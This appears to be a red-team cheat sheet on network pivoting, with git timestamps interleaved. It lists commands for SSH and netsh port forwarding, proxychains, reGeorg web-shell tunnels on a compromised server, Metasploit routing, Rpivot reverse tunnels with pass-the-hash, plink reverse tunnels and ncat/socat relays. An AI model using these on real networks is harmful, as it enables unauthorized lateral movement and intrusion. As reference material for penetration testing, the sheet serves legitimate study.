2018-02-15 22:27:42 +00:00
# Network Pivoting Techniques
2018-06-09 16:56:19 +00:00
## Windows netsh Port Forwarding
2018-08-12 21:30:22 +00:00
2018-06-09 16:56:19 +00:00
```powershell
netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110
```
2018-08-12 21:30:22 +00:00
2018-06-09 16:56:19 +00:00
1. listenaddress – is a local IP address waiting for a connection.
2. listenport – local listening TCP port (the connection is waited on it).
3. connectaddress – is a local or remote IP address (or DNS name) to which the incoming connection will be redirected.
4. connectport – is a TCP port to which the connection from listenport is forwarded to.
2018-02-15 22:27:42 +00:00
## SSH
### SOCKS Proxy
2018-08-12 21:30:22 +00:00
2018-06-09 16:56:19 +00:00
```bash
2018-02-15 22:27:42 +00:00
ssh -D8080 [user]@[host]
ssh -N -f -D 9000 [user]@[host]
-f : ssh in background
-N : do not execute a remote command
```
2018-09-10 21:12:29 +00:00
Cool Tip : Konami SSH Port forwarding
```bash
[ENTER] + [~C]
-D 1090
```
2018-02-15 22:27:42 +00:00
### Local Port Forwarding
2018-08-12 21:30:22 +00:00
2018-06-09 16:56:19 +00:00
```bash
2018-02-15 22:27:42 +00:00
ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
```
### Remote Port Forwarding
2018-08-12 21:30:22 +00:00
2018-06-09 16:56:19 +00:00
```bash
2018-02-15 22:27:42 +00:00
ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
```
## Proxychains
2018-08-12 21:30:22 +00:00
2018-02-15 22:27:42 +00:00
**Config file**: /etc/proxychains.conf
2018-08-12 21:30:22 +00:00
2018-02-15 22:27:42 +00:00
```bash
[ProxyList]
socks4 localhost 8080
```
2018-08-12 21:30:22 +00:00
2018-08-26 13:43:26 +00:00
Set the SOCKS4 proxy then `proxychains nmap -sT 192.168.5.6`
2018-02-15 22:27:42 +00:00
## Web SOCKS - reGeorg
2018-08-12 21:30:22 +00:00
[reGeorg ](https://github.com/sensepost/reGeorg ), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
2018-11-24 12:49:08 +00:00
Drop one of the following files on the server:
- tunnel.ashx
- tunnel.aspx
- tunnel.js
- tunnel.jsp
- tunnel.nosocket.php
- tunnel.php
- tunnel.tomcat.5.jsp
2018-08-12 21:30:22 +00:00
```python
2018-11-24 12:49:08 +00:00
python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp # the socks proxy will be on port 8080
optional arguments:
-h, --help show this help message and exit
-l , --listen-on The default listening address
-p , --listen-port The default listening port
-r , --read-buff Local read buffer, max data to be sent per POST
-u , --url The url containing the tunnel script
-v , --verbose Verbose output[INFO|DEBUG]
```
## Metasploit
```c
portfwd list
portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445
or
run autoroute -s 192.168.57.0/24
use auxiliary/server/socks4a
2018-02-15 22:27:42 +00:00
```
## Rpivot
Server (Attacker box)
2018-08-12 21:30:22 +00:00
2018-02-15 22:27:42 +00:00
```python
python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0
```
Client (Compromised box)
2018-08-12 21:30:22 +00:00
2018-02-15 22:27:42 +00:00
```python
python client.py --server-ip < ip > --server-port 9443
```
Through corporate proxy
2018-08-12 21:30:22 +00:00
2018-02-15 22:27:42 +00:00
```python
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e
```
Passing the hash
2018-08-12 21:30:22 +00:00
2018-02-15 22:27:42 +00:00
```python
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe \
--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE
```
2018-10-18 15:32:01 +00:00
## plink
```powershell
plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389 --> exposes the RDP port of the machine in the port 3390 of the SSH Server
plink -l root -pw mypassword 192.168.18.84 -R
plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
```
2018-02-15 22:27:42 +00:00
## Basic Pivoting Types
2018-08-12 21:30:22 +00:00
2018-02-15 22:27:42 +00:00
| Type | Use Case |
| :------------- | :------------------------------------------ |
| Listen - Listen | Exposed asset, may not want to connect out. |
| Listen - Connect | Normal redirect. |
| Connect - Connect | Can’ t bind, so connect to bridge two hosts |
## Listen - Listen
2018-08-12 21:30:22 +00:00
2018-02-15 22:27:42 +00:00
| Type | Use Case |
| :------------- | :------------------------------------------ |
| ncat | `ncat -v -l -p 8080 -c "ncat -v -l -p 9090"` |
| socat | `socat -v tcp-listen:8080 tcp-listen:9090` |
| remote host 1 | `ncat localhost 8080 < file` |
| remote host 2 | `ncat localhost 9090 > newfile` |
## Listen - Connect
2018-08-12 21:30:22 +00:00
2018-02-15 22:27:42 +00:00
| Type | Use Case |
| :------------- | :------------------------------------------ |
| ncat | `ncat -l -v -p 8080 -c "ncat localhost 9090"` |
| socat | `socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090` |
| remote host 1 | `ncat localhost -p 8080 < file` |
| remote host 2 | `ncat -l -p 9090 > newfile` |
## Connect - Connect
2018-08-12 21:30:22 +00:00
2018-02-15 22:27:42 +00:00
| Type | Use Case |
| :------------- | :------------------------------------------ |
| ncat | `ncat localhost 8080 -c "ncat localhost 9090"` |
| socat | `socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090` |
| remote host 1 | `ncat -l -p 8080 < file |
| remote host 2 | `ncat -l -p 9090 > newfile` |
## Thanks to
2018-08-12 21:30:22 +00:00
* [Network Pivoting Techniques - Bit rot ](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/ )
* [Port Forwarding in Windows - Windows OS Hub ](http://woshub.com/port-forwarding-in-windows/ )
2018-10-08 11:49:50 +00:00
* [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin ](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences )
2018-11-24 12:49:08 +00:00
* [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko ](https://artkond.com/2017/03/23/pivoting-guide/ )
* [Pivoting Meterpreter ](https://www.information-security.fr/pivoting-meterpreter/ )